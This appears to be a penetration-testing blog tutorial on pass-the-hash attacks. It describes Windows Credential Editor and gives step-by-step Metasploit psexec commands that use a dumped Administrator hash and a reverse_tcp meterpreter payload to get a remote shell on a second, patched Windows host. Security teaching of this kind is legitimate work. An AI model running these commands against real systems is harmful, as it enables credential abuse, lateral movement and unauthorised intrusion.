With Pass-the-hash, a simple un-cracked hash can be used to compromise other systems using the same account.
How it works:
Once we gain root access to a system, one of the first things we do is grab password hashes, (demonstrated in a previous post), and we typically immediately jump to cracking these hashes. BUT, even an un-cracked hash can be useful. If other systems use the same credentials, we can simply pass the hash along to that system and it will happily accept it and execute code for us.
One method for accomplishing this task is to use the Windows Credential Editor (wce). Written by Hernan Ochoa, it is available from www.ampliasecurity.com/research.html
This tool essentially allows you to edit the memory space of the running LSASS process, replacing your credentials with your victim's username and hash. You can then interact with other systems using any built in windows tool (net use, reg, psexec), and you'll effectively impersonate the victim.
***Newer versions of the tool even allow you to use stolen Kerberos tokens (with the -k and -K options).
Now, there is a simpler method for doing a pass-the-hash attack. Since version 3.1, metasploit has a built in method for it in the psexec exploit. It is VERY EASY, as I'll demonstrate.
We're going to use a hash we've gained from target1 (old vulnerable Windows server), to gain access to target2 (windows XPsp3, fully patched).
First, we dump target1 hashes using the hashdump command, and we copy off Administrator's hash.
Now we start up msfconsole.
The exploit we want is psexec, and for a payload we will use a reverse meterpreter shell, so we issue these commands:
use windows/smb/psexecWe then set the variables for RHOST (target#2's IP) and LHOST (our IP).
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST "target2 IP"
set LHOST "Our IP"
Now comes the magic. We set the user and password variables. Metasploit will automatically recognize if a hash is used for SMBPass and will use pass-the-hash rather than a password attempt.
set SMBUser AdministratorThat's it, run "exploit".
set SMBPass 73a87bf2afc9ca49b69e407095566351:1c31f...
As you can see, this set up the reverse handler, connected to port 445 on target2, and using the hash we supplied it was able to execute our payload, giving us a meterpreter shell.
Because of one unmanaged legacy system, we were able to thoroughly own a completely patched box.